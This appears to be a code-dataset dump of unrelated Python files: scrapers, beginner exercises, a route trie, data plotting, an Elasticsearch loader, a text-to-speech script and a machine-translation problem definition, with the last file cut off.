+{"seq_id":"302933071","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom itertools import zip_longest\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as 
EC\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nimport re\nimport time\nfrom datetime import datetime\n\nfileOpen = \"csv/1.csv\"\nfileSave = 'csv_save/1.csv'\nclean = re.compile('<.*?>')\n\n\ndef parcing_data_max(datas):\n data_max = []\n for i in datas:\n if i != \"-\":\n string = i.replace('.', '/')\n data_max.append(datetime.strptime('{}'.format(string), '%d/%m/%Y'))\n\n return data_max\n\n\ndef findKC(datas, data_string_table):\n KC = []\n\n for v, i in enumerate(datas):\n\n print(datas)\n if i == \"-\":\n KC.append(\"NOT\")\n datas[v] = datas[v].replace(i, '777')\n\n for v, i in enumerate(data_string_table):\n for j in datas:\n if i == j:\n KC.append(data_string_table[v + 3])\n\n print(datas, \"dsdsdsds\", KC)\n return KC\n\n\ndef data_table(fp, datas, data_string_table, cadCost, cn, estateType, address):\n strTpWrite = \"\"\n print(datas, cadCost)\n date_max = parcing_data_max(datas) # Парсим дату, чтобы получить максимальное значение даты из списка\n maximum_data = \"\"\n mapa = dict(zip(datas, cadCost))\n if len(date_max) != 0:\n maximum_data = max(date_max) # Берем максимальную дату из списка\n KC = findKC(datas, data_string_table) # Забираем КС\n print(datas)\n print(KC)\n\n print(mapa)\n\n for v, i in enumerate(mapa):\n if i != \"-\":\n string = i.replace('.', '/')\n string = datetime.strptime('{}'.format(string), '%d/%m/%Y')\n if string == maximum_data:\n elementsToWrite = [cn, estateType, address, KC[v], mapa[i]]\n strTpWrite = \";\".join(elementsToWrite)\n print(strTpWrite)\n else:\n elementsToWrite = [cn, estateType, address, \"ОчереднаяГКО\", mapa[i]]\n strTpWrite = \";\".join(elementsToWrite)\n\n if not mapa:\n writen = [cn, estateType, address, \"NOT FOUND\", \"NOT FOUND\"]\n Write = \";\".join(writen)\n fp.write(Write + \"\\n\")\n else:\n fp.write(strTpWrite + \"\\n\")\n\n\ndef open_web(cn, estateType, address, soup):\n a, b, c = 0, 0, 0\n datas = []\n cadCost = []\n data_string_table = []\n with open(fileSave, 'a') as fp:\n for link in soup.find_all('div', attrs={'class': 'main_data'}):\n rows = link.find_all('tr', attrs={'class': 'tbody'})\n\n if a == 0:\n for data in rows:\n data = data.find('td', attrs={'class': 'table_row_align_center'})\n for i in data:\n string = ''.join(i.split())\n datas.append(string)\n a = 1\n if b == 0:\n for string_table in rows:\n string_table = string_table.find_all('td', attrs={'class': 'table_row_align_center'})\n for i in string_table:\n string = \"\\t\".join([str(x).strip() for x in i.contents])\n string = re.sub(clean, \"\\t\", string)\n string = ''.join(string.split())\n data_string_table.append(string)\n b = 1\n print(data_string_table)\n\n if c == 0:\n for many in rows:\n many = many.find_all('a', attrs={'class': 'cadcost'})\n for j in many:\n string = \"\\t\".join([str(x).strip() for x in j.contents])\n string = re.sub(clean, \"\\t\", string)\n string = ''.join(string.split())\n if string != \"-\":\n cadCost.append(string)\n c = 1\n\n data_table(fp, datas, data_string_table, cadCost, cn, estateType, address)\n\n\ndef main():\n nextiteration = []\n\n with open(fileOpen) as csvfile:\n for csvLine in csvfile:\n cn = csvLine[:csvLine.find(';')]\n with open(fileSave) as file:\n for csvLinesave in file:\n cn1 = csvLinesave[:csvLinesave.find(';')]\n if cn == cn1:\n nextiteration.append(csvLine)\n\n url = \"https://rosreestr.ru/wps/portal/p/cc_ib_portal_services/cc_ib_ais_fdgko\"\n\n with open(fileOpen) as csvfile:\n for csvLine in csvfile:\n cnt = 0\n\n for i in nextiteration:\n if i == csvLine:\n cnt = 1\n 
break\n\n if cnt == 1:\n continue\n\n cn, estateType, address = csvLine.split(\";\", 3)\n\n print(cn, estateType, address)\n\n address = address.rstrip()\n\n options = FirefoxOptions()\n options.add_argument(\"--headless\")\n options.headless = True\n driver = webdriver.Firefox('/home/rasha/Загрузки/geckodriver-v0.23.0-linux64', options=options)\n driver.implicitly_wait(10) # seconds\n driver.get(url)\n time.sleep(5)\n try:\n elem = WebDriverWait(driver, 60).until(\n EC.presence_of_element_located((By.NAME, \"search.searchString\"))\n )\n elem.send_keys(cn)\n\n button = driver.find_element_by_class_name(\"search_button\")\n button.click()\n except:\n driver.quit()\n time.sleep(5)\n\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n driver.quit()\n open_web(cn, estateType, address, soup)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40456851","text":"#7.1 Write a program that prompts for a file name, then opens that file and reads through the file, and print the contents of the file in upper case. \n#Use the file words.txt to produce the output below.\n\n\n\n# Use words.txt as the file name\nfname = input(\"Enter file name: \")\nfh = open(fname)\nfor line in fh :\n line = line.rstrip() #we use rstrip to get rid of the empty space between the lines\n x = line.upper()\n print(x)\n","sub_path":"Week 3/Assignment 7.1.py","file_name":"Assignment 7.1.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189785004","text":"'''\r\nFaça um programa que calcule o número médio de alunos por turma. Para isto, peça a quantidade de turmas e a quantidade de alunos para cada turma. 
As turmas não podem ter mais de 40 alunos.\r\n'''\r\n\r\n\r\nif __name__ == '__main__':\r\n    quant_turma = int(input('Insira a quantidade de turmas: '))\r\n\r\n    if quant_turma > 0:\r\n\r\n        contador = 0\r\n        somador = 0\r\n        while contador < quant_turma:\r\n\r\n            quant_aluno_turma = int(input('Insira a quantidade de alunos para a %sª turma: ' %(contador + 1)))\r\n\r\n            if quant_aluno_turma > 0 and quant_aluno_turma <= 40:\r\n                contador += 1\r\n                somador += quant_aluno_turma\r\n            else:\r\n                print('Quantidade de alunos inválida, tente novamente')\r\n\r\n        media = somador / contador\r\n        print('A quantidade média de alunos por turma é igual a %s' %(media))\r\n\r\n    else:\r\n        print('Quantidade de turma insuficiente')\r\n","sub_path":"Lista de Exercícios/02 - Estrutura de repetição/ex027.py","file_name":"ex027.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560012022","text":"class RouteTrieNode:\n    def __init__(self, handler=None):\n        self.handler = handler\n        self.children = {}\n\n    def insert(self, route):\n        self.children[route] = RouteTrieNode()\n\n\nclass RouteTrie:\n    def __init__(self):\n        self.root = RouteTrieNode()\n\n    def insert(self, paths, handler):\n        current_node = self.root\n\n        for path in paths:\n            if path not in current_node.children:\n                current_node.children[path] = RouteTrieNode()\n            current_node = current_node.children[path]\n\n        current_node.handler = handler\n\n    def find(self, paths):\n        current_node = self.root\n\n        for path in paths:\n            if path not in current_node.children:\n                return None\n            current_node = current_node.children[path]\n\n        return current_node.handler\n\n\nclass Router:\n    def __init__(self, handler, not_found_handler=\"404\"):\n        self.routes = RouteTrie()\n        self.routes.insert(\"/\", handler)\n        self.not_found = not_found_handler\n\n    def add_handler(self, route, handler):\n        paths = self.split_path(route)\n        self.routes.insert(paths, handler)\n\n    def lookup(self, route):\n        paths = self.split_path(route)\n        return self.routes.find(paths) or self.not_found\n\n    def split_path(self, route):\n        if len(route) == 1:\n            return [\"/\"]\n        else:\n            return route.strip(\"/\").split(\"/\")\n\n\n# create the router and add a route\nrouter = Router(\"root handler\", \"not found handler\")\nrouter.add_handler(\"/home/about\", \"about handler\")\n\nprint(router.lookup(\"/\"))\n# root handler\n\nprint(router.lookup(\"/home\"))\n# not found handler\n\nprint(router.lookup(\"/home/about\"))\n# about handler\n\nprint(router.lookup(\"/home/about/\"))\n# about handler\n\nprint(router.lookup(\"/home/about/me\"))\n# not found handler\n","sub_path":"P2/problem_7.py","file_name":"problem_7.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"621432813","text":"import json\nfrom elasticsearch_dsl.connections import connections\nfrom elasticsearch_dsl import Index, DocType, String, analyzer\n\nDATA_FILE='data/entities.jsonl'\nINDEX='entities'\nentities = Index('entities')\n\ndata_analyzer = analyzer('data_analyzer',\n    tokenizer=\"standard\",\n    filter=[\"standard\"]\n)\n\nclass Entity(DocType):\n    name = String(index='not_analyzed')\n    data = String(\n        analyzer=data_analyzer,\n    )\n\n    class Meta:\n        index = INDEX\n\ndef init():\n    connect()\n    delete_index()\n    create_mappings()\n    persist_data()\n    health()\n\ndef connect():\n    connections.create_connection(hosts=['localhost'])\n\ndef delete_index():\n    # delete the index, ignore if it 
doesn't exist\n entities.delete(ignore=404)\n\ndef create_mappings():\n # create mappings in Elasticsearch\n Entity.init()\n\ndef persist_data(data_file = DATA_FILE):\n entities = load_entities()\n for index, entity in enumerate(entities):\n es_entity = Entity(meta={'id': index}, name=entity['name'], data=entity['data'])\n # save document into cluster\n es_entity.save()\n\ndef load_entities(data_file = DATA_FILE):\n with open(data_file, 'r') as fd:\n lines = fd.readlines()\n print(lines[0])\n return [json.loads(line) for line in lines]\n\ndef health():\n print(connections.get_connection().cluster.health())\n\nif __name__ == \"__main__\":\n init()\n","sub_path":"searchengine/persistence.py","file_name":"persistence.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275459952","text":"from graph.core import *\n\nfrom graph.load_xml import load_graph_types_and_instances\nfrom graph.save_xml import save_graph\nimport sys\nimport os\nimport math\n\n\nimport os\nappBase=os.path.dirname(os.path.realpath(__file__))\n\nsrc=appBase+\"/token_ring.xml\"\n(graphTypes,graphInstances)=load_graph_types_and_instances(src,src)\n\nn = 2 \n\ngraphType=graphTypes[\"token_ring\"]\ndevType=graphType.device_types[\"device\"]\n\ninstName=\"token_ring_{}_{}\".format(n,n)\nproperties={}\nres=GraphInstance(instName, graphType, properties)\nnodes={}\n\nfor i in range(0,n):\n sys.stderr.write(\" Device {}\\n\".format(i + 1))\n \n if initToken:\n devProps={\"hasInitToken\": 1}\n else:\n devProps={\"hasInitToken\": 0}\n \n di=DeviceInstance(res,\"n_{}\".format(i + 1), devType, devProps)\n nodes[i]=di\n res.add_device_instance(di)\n \ndef add_channel(s, d):\n dst=nodes[s]\n src=nodes[d]\n ei=EdgeInstance(res, d,\"in\", s,\"out\")\n res.add_edge_instance(ei)\n\n\nfor i in range(0,n):\n add_channel(i, (i + 1) % n)\n\nsave_graph(res,sys.stdout) \n","sub_path":"graph_schema-master/apps/token_ring/create_token_ring_instance.py","file_name":"create_token_ring_instance.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444665846","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nUniversidade de Lisboa\nFaculdade de Ciências\nDepartamento de Informática\nLicenciatura em Tecnologias da Informação\n2015/2016\n\nProgramação II\n\nProjeto de programação:\nCrime numa grande cidade\n\"\"\"\n\n__author__ = \"Pedro Fernandes, 456597, Andre Gonçalvez,46577\"\n\nimport time\nimport datetime\nimport csv\n#import pylab\nimport numpy as np\nimport matplotlib.pyplot as pylab\n\nfrom math import radians, cos, sin, asin, sqrt,pi\n\ndef crimes(nome_ficheiro):\n \"\"\"\n Esta função recebe o nome de um ficheiro como parâmetro e traça uma figura com quatro gráficos,\n Requires: Nome_ficheiro ser um ficheiro CSV\n Ensures: Figura com quatro graficos \n \"\"\"\n \n dados = dados_crimes(nome_ficheiro)\n\n traca_crimes_por_data(dados[0])\n traca_crimes_por_hora(dados[1])\n traca_crimes_por_tipo(dados[2])\n traca_crimes_por_distancia(dados[3])\n\n pylab.show()\n\n\ndef traca_crimes_por_data(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,1)\n pylab.title('Numero de crimes por dia')\n pylab.xlabel('Anos')\n pylab.ylabel('#Crimes')\n pylab.xticks(map(lambda x: x + 0 / 2.0, 
range(len(grafico[0]))), grafico[0])\n pylab.plot(range(len(grafico[1])),grafico[1])\n## pylab.xlim([2011, 2016])\n \ndef traca_crimes_por_hora(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,2)\n pylab.title('Numero de crimes por hora')\n pylab.xlabel('Horas')\n pylab.ylabel('#Crimes')\n \n ordenadas = grafico[1]\n abcissas = range(len(ordenadas))\n largura = 1\n etiquetas=grafico[0]\n pylab.xticks(map(lambda x: x + largura / 2.0, abcissas), etiquetas)\n pylab.bar(abcissas, ordenadas, largura, color='blue')\n \ndef traca_crimes_por_tipo(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,3)\n pylab.title('Numero de crimes por tipo')\n pylab.xlabel('Anos')\n pylab.ylabel('#Crimes') \n \n ordenadas = grafico[1]\n abcissas = range(len(ordenadas))\n largura = 1\n etiquetas=grafico[0]\n pylab.xticks(map(lambda x: x + largura / 2.0, abcissas), etiquetas,rotation='vertical')\n pylab.bar(abcissas, ordenadas, largura, color='blue')\n \ndef traca_crimes_por_distancia(grafico):\n \"\"\"\n Função que recebe uma tabela e constroi um grafico\n Requires: grafico é uma tabela (tuplo com duas listas, uma das abcissas, outra das ordenadas)\n Ensures: Um grafico \n \"\"\"\n pylab.subplot(2,2,4)\n pylab.title('Numero de crimes por distancia ao centro')\n pylab.xlabel('Distancia(x 100m)')\n pylab.ylabel('#Crimes por km2')\n abcissas = range(len(grafico[0]))\n ordenadas = (map(lambda x: x, grafico[1]))\n pylab.plot(abcissas ,ordenadas)\n pylab.xlim([0,100])\n\n\ndef crimes_por_data(tabela):\n \"\"\"\n Função que organiza e contabiliza o numero de ocorrencias de crimes por data. 
Eixo dos XX representado por uma escala de anos.\n Requires: Lista de dicionarios\n Ensures: Par de listas, abcissas e ordenadas\n \"\"\"\n crimeData = [] \n incidents = [] \n abcissa = [] #contêm as datas dos crimes por ordem crescente\n ordenadas = [] #contêm o número de crimes que ocorreram em cada data\n lista = []\n data_ord = [] \n l = []\n for crime in tabela:\n crimeData.append(crime[\"CrimeDate\"])\n incidents.append(crime[\"Total Incidents\"])\n\n \n for dates in crimeData:\n d = dates.split(\"/\")\n if len(d) > 0:\n d[0],d[1] = d[1],d[0]\n lista.append(d)\n \n for s in lista:\n data_ord.append(\"/\".join(s))\n data_ordenada = sorted(data_ord, key=lambda x: datetime.datetime.strptime(x, '%d/%m/%Y'))\n \n for data in data_ordenada:\n data_ordenada1 = data.split(\"/\")\n data_ordenada1.reverse()\n abcissa.append(\"\".join(data_ordenada1))\n #print abcissa\n \n abcis = list(set(abcissa))\n abcissas = sorted(abcis, key=lambda x: datetime.datetime.strptime(x, '%Y%m%d'))\n for i in abcissas:\n ordenadas.append(abcissa.count(i))\n if i[0:4] not in l:\n l.append(str(i[0:4]))\n return l,ordenadas\n \ndef crimes_por_hora(tabela):\n \"\"\"\n Função que organiza e contabiliza o numero de ocorrencias de crimes por hora\n Requires: Lista de dicionários\n Ensures: Par de listas abcissas e ordenadas\n \"\"\"\n crimeTime = []\n abcissas = []\n ordenadas = []\n \n for tempo in tabela:\n crimeTime.append(tempo['CrimeTime'][:2])\n #crimeTime-> horas onde houve crimes\n \n \n for i in range(24):\n if i < 10:\n abcissas.append(\"0\"+str(i))\n ordenadas.append(crimeTime.count(\"0\"+str(i)))\n else:\n abcissas.append(str(i))\n # abcissas->lista com 24 string['00',...,'23']\n ordenadas.append(crimeTime.count(str(i)))\n return abcissas,ordenadas\n\ndef crimes_por_tipo(tabela):\n \"\"\"\n Função que organiza e contabiliza o numero de ocorrencias por tipo de crime\n Requires: lista de dicionários\n Ensures: Par de listas abcissas e ordenadas\n \"\"\"\n tipo = []\n ordenadas = []\n for crime in tabela:\n tipo.append(crime['Description'])\n abcissas = list(set(tipo))\n #print tipo\n #print abcissas\n\n for i in abcissas:\n ordenadas.append(tipo.count(i))\n return abcissas,ordenadas\n\ndef crimes_por_distancia(tabela):\n \"\"\"\n Função que contabiliza o numero de crimes por distancia ao centro(definido na funcao) de uma cidade.\n Requires: tabela é uma lista de dicionários\n Ensures: Par de listas abcissas e ordenadas\n \"\"\"\n #lat1 e lon1 --> coordenadas Location1\n #lat2 e lon2 --> coordenadas Centro\n \n location = []\n distancia = []\n abcissas = []\n ordenadas = []\n for crime in tabela:\n location.append(crime['Location 1'][1:-1])\n for coord in location:\n if len(coord) > 0:\n coords = coord.split(', ')\n distancia.append(int(haversine(float(coords[0]),float(coords[1]),39.289444,-76.616667)/100))\n abcis = list(set(distancia))\n abcissas = sorted(abcis)\n## for i in abcissas:\n## cnt=distancia.count(i)\n## ordenadas.append(round(cnt/((pi*0.32)-(pi*0.22))))\n \n ordenadas = map(lambda x:round(distancia.count(x)/((pi*0.32)-(pi*0.22))),abcissas)\n return abcissas,ordenadas\n\n\n\ndef haversine(lat1, lon1, lat2, lon2):\n \"\"\"\n Returns the great circle distance between two GPS points given in degrees.\n See:\n http://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points\n http://www.movable-type.co.uk/scripts/latlong.html\n \"\"\"\n lat1, lat2, dlat, dlon = map(radians, [lat1, lat2, lat2 - lat1, lon2 - lon1])\n a = sin(dlat / 2.0) ** 2 + cos(lat1) * 
cos(lat2) * sin(dlon / 2.0) ** 2\n c = 2 * asin(sqrt(a))\n raio_da_terra_em_metros = 6371000\n return c * raio_da_terra_em_metros\n\n\ndef ler_tabela_de_csv(nome_ficheiro_csv):\n \"\"\"\n Requires: o nome de um ficheiro CSV com cabeçalho na primeira linha.\n Ensures: retorna uma tabela no formato de lista de dicionários.\n \"\"\"\n with open(nome_ficheiro_csv, 'rU') as ficheiro_csv:\n leitor = csv.DictReader(ficheiro_csv, delimiter=',')\n return [linha for linha in leitor]\n\n\n### Verificando o tempo que leva a construir os dados dos gráficos\n\nfrom timeit import timeit\n\n# Uma string representando o nome do ficheiro CSV contendo os dados de\n# interesse para o trabalho. Coloquem aqui o nome do vosso ficheiro.\nficheiro_dados_crimes = None\n\ndef go_time():\n \"\"\"Ensures: Devolve o tempo de execução da função dados_crimes()\n quando aplicada ao ficheiro ficheiro_dados_crimes.\n \"\"\"\n return timeit(\"dados_crimes(ficheiro_dados_crimes)\",\n \"from projeto import dados_crimes\", number = 1)\n\ndef dados_crimes(nome_ficheiro):\n \"\"\"Esta função não deve levar mais do que um determinado tempo\n quando executada numa máquina do laboratório do Departamento de\n Informática. O tempo em questão será anunciado na semana 9 de maio\n de 2016.\n\n Requires: nome_ficheiro é uma string representando o nome de um\n ficheiro CSV com dados sobre crimes.\n \n Ensures: Devolve um quadrúplo com os dados referentes a cada um dos\n quatro gráficos, de acordo com o enunciado do projeto.\n \"\"\"\n t = ler_tabela_de_csv(nome_ficheiro)\n return crimes_por_data(t), crimes_por_hora(t), \\\n crimes_por_tipo(t), crimes_por_distancia(t)\n\n##if __name__ == \"__main__\":\n## #tabela= ler_tabela_de_csv('teste.csv')\n## #grafico = crimes_por_tipo(tabela)\n## #traca_crimes_por_tipo(grafico)\n## #print(crimes_por_hora(ler_tabela_de_csv('teste.csv')))\n## #tabela= ler_tabela_de_csv('teste.csv')\n## #grafico = crimes_por_hora(tabela)\n## #traca_crimes_por_hora(grafico)\n","sub_path":"Projeto/projeto.py","file_name":"projeto.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445461541","text":"\"\"\"\n task4_1.py - school listing test file\n\n This file is a continuation of the previous exercise (task3_1.py).\n\n In this part of the exercise, the driver will communicate with a new module. This\n module contains an XMLRPC client. 
The XMLRPC client remotely communicates\n    with the XMLRPC server.\n\n    Note: for imports to work properly, your student_files folder should be on your\n    PYTHONPATH.\n\n    Also, remember to run server.py before running this client.\n\"\"\"\nimport ch04_network_prog.solution.client as client\n\n\nif __name__ == '__main__':\n    school_name = input('Enter partial school name: ')\n    results = client.get_schools(school_name)\n    for cnt, school in enumerate(results, 1):\n        print('{0:<5}{fullname} ({city}, {state})'.format(cnt, **school))\n","sub_path":"Optum Tech/IN1468 available until 12-31-20/IN1468_student_files/student_files/ch04_network_prog/solution/task4_1.py","file_name":"task4_1.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"104689549","text":"#!/usr/bin/env python\n#_*_coding:utf-8_*_\n#__author__ = pcjboy\n# Date 18.5.18\n\n# Turning in-memory data into a string is called serialization\n# data = {\n#\n#     'roles':[\n#         {'role':'monster','type':'pig','life':50},\n#         {'role':'hero','type':'关习','life':80},\n#     ]\n# }\n# f = open(\"game_status\", 'w')\n# f.write(str(data))\n\n# Turning string data back into in-memory data is called deserialization\nf = open(\"game_status\",\"r\")\nd = f.read()\nd = eval(d)\nprint(d['roles'])\n\n","sub_path":"chapter4-常用模块/序列化.py","file_name":"序列化.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133084202","text":"# Import the required module for text \n# to speech conversion \nfrom gtts import gTTS \n#from playsound import playsound as ps\n# This module is imported so that we can \n# play the converted audio \nimport os \nimport pygame\n# The text that you want to convert to audio\ndef play_audio(mytext):\n\n    # Language in which you want to convert \n    language = 'en'\n\n    # Passing the text and language to the engine, \n    # here we have marked slow=False. 
Which tells \n # the module that the converted audio should \n # have a high speed\n \n myobj = gTTS(text=mytext, lang=language, slow=False) \n\n # Saving the converted audio in a mp3 file named \n # welcome \n myobj.save(\"welcome.mp3\")\n \n #ps('welcome.mp3')\n # Playing the converted file \n #os.system(\"mpg321 welcome.mp3\")\n pygame.mixer.init()\n pygame.mixer.music.load(\"welcome.mp3\")\n\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy() == True:\n continue\n \nplay_audio(\"This is the news\")\n\n\n\n","sub_path":"TextToSpeech/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208206316","text":"# coding=utf-8\nfrom decorator import new_thread\nfrom util import db_util\n\nquery = db_util.get_query()\n\n\n@new_thread\ndef syn1():\n query.Query(\"select * from ksexpt.ks_user\")\n\n for row in query.record:\n print(\"ks\", row['username'])\n\n query.call_proc(\"call ksexpt.proc_call_behavior()\")\n\n\n@new_thread\ndef syn2():\n query.Query(\"select * from ksexpt.ndb_user\")\n\n for row in query.record:\n print(\"ndb\", row['username'])\n\nif __name__ == '__main__':\n [x.join() for x in [syn1(), syn2()]]\n","sub_path":"action/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"605097726","text":"import sympy\nimport numpy as np\nimport matplotlib.pyplot as py\nfrom matplotlib import animation\n\n# Module 3 graded assessment - Part 1\n\n# Calculating Constants\n# -----------------------------------------------------------------------------\n\nu_max, u_star, rho_max, rho_star, A, B = sympy.symbols('u_max u_star rho_max rho_star A B')\n\neq1 = sympy.Eq( 0, u_max*rho_max*(1 - A*rho_max-B*rho_max**2) )\neq2 = sympy.Eq( 0, u_max*(1 - 2*A*rho_star-3*B*rho_star**2) )\neq3 = sympy.Eq( u_star, u_max*(1 - A*rho_star - B*rho_star**2) )\neq4 = sympy.Eq(eq2.lhs - 3*eq3.lhs, eq2.rhs - 3*eq3.rhs)\n\nrho_sol = sympy.solve(eq4,rho_star)[0]\n\nB_sol = sympy.solve(eq1,B)[0]\n\nquadA = eq2.subs([(rho_star, rho_sol), (B,B_sol)])\n\nA_sol = sympy.solve(quadA, A)\n\naval = A_sol[0].evalf(subs={u_star:1.5, u_max:2.0, rho_max:15.0} )\nprint('A is {:.5f}'.format(aval))\n\nbval = B_sol.evalf(subs={rho_max:15.0, A:aval} )\nprint('B is {:.5f}'.format(bval))\n\n# Maximum Density Limit\n# -----------------------------------------------------------------------------\n\nrho_sol = sympy.solve(eq2, rho_star)[0]\nrho_val = rho_sol.evalf(subs = {u_max: 2.0, A: aval, B: bval} )\n\nprint('rho max is {:.2f}'.format(rho_val))\n","sub_path":"mod3-riding-wave/graded-1.py","file_name":"graded-1.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294433647","text":"\nimport streamlit as st\nfrom textblob import TextBlob\nfrom PIL import Image\ndef main():\n st.title(\"Sentiment Analysis\")\n img=Image.open(\"sentiment-analysis_1.jpg\")\n st.image(img)\n st.write(\"sentiment analysis\")\n text=st.text_input(\"Enter a sentence--\")\n if st.button(\"Analysis\"):\n br=TextBlob(text)\n result=br.sentiment.polarity\n if result==0:\n st.success(\"This is a Neutral Message\")\n elif result>0:\n st.success(\"This is a Positive Message\")\n else:\n st.success(\"This is a Negative Message\")\n \nif __name__==\"__main__\":\n main() 
\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191344368","text":"#pi的计算\nfrom math import sqrt\nfrom random import random\nfrom time import clock\nDATRS = 1200\nTips = 0\nclock()\nfor i in range(1,DATRS):\n x,y = random(),random()\n dist = sqrt(x ** 2 + y ** 2)\n if dist <= 1.0:\n Tips = Tips+1\npi = 4*(Tips/DATRS)\nprint(\"得到π的值为; %s\"%pi)\nprint(\"所用到的时间为:%-5.5ss\"%clock())","sub_path":"Python practice/计算PI值.py","file_name":"计算PI值.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442311929","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by Jack on 04/02/2018\n\n\"\"\"Data generators for translation data-sets.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tarfile\n\n# Dependency imports\n\nfrom tensor2tensor.data_generators import generator_utils\nfrom tensor2tensor.data_generators import problem\nfrom tensor2tensor.data_generators import text_encoder\nfrom tensor2tensor.data_generators import translate\nfrom tensor2tensor.utils import registry\n\nimport tensorflow as tf\n\nFLAGS = tf.flags.FLAGS\n\n# End-of-sentence marker.\nEOS = text_encoder.EOS_ID\n\n_ENDE_TRAIN_DATASETS = [\n [\n \"http://data.statmt.org/wmt17/translation-task/training-parallel-nc-v12.tgz\", # pylint: disable=line-too-long\n (\"training/news-commentary-v12.de-en.en\",\n \"training/news-commentary-v12.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz\",\n (\"commoncrawl.de-en.en\", \"commoncrawl.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz\",\n (\"training/europarl-v7.de-en.en\", \"training/europarl-v7.de-en.de\")\n ],\n]\n_ENDE_TEST_DATASETS = [\n [\n \"http://data.statmt.org/wmt17/translation-task/dev.tgz\",\n (\"dev/newstest2013.en\", \"dev/newstest2013.de\")\n ],\n]\n\n\ndef _get_wmt_ende_bpe_dataset(directory, filename):\n \"\"\"Extract the WMT en-de corpus `filename` to directory unless it's there.\"\"\"\n train_path = os.path.join(directory, filename)\n if not (tf.gfile.Exists(train_path + \".de\") and\n tf.gfile.Exists(train_path + \".en\")):\n url = (\"https://drive.google.com/uc?export=download&id=\"\n \"0B_bZck-ksdkpM25jRUN2X2UxMm8\")\n corpus_file = generator_utils.maybe_download_from_drive(\n directory, \"wmt16_en_de.tar.gz\", url)\n with tarfile.open(corpus_file, \"r:gz\") as corpus_tar:\n corpus_tar.extractall(directory)\n return train_path\n\n\n@registry.register_problem\nclass TranslateMnzhBpe32k(translate.TranslateProblem):\n \"\"\"Problem spec for WMT En-De translation, BPE version.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 32000\n\n @property\n def vocab_name(self):\n return \"vocab.bpe\"\n\n def source_vocab_name(self):\n return \"vocab.32k.mn.txt\"\n\n def target_vocab_name(self):\n return \"vocab.32k.zh.txt\"\n\n def feature_encoders(self, data_dir):\n source_vocab_filename = os.path.join(data_dir, self.source_vocab_name())\n target_vocab_filename = os.path.join(data_dir, self.target_vocab_name())\n source_encoder = text_encoder.TokenTextEncoder(source_vocab_filename, replace_oov=\"UNK\")\n target_encoder = text_encoder.TokenTextEncoder(target_vocab_filename, replace_oov=\"UNK\")\n return {\"inputs\": source_encoder, \"targets\": 
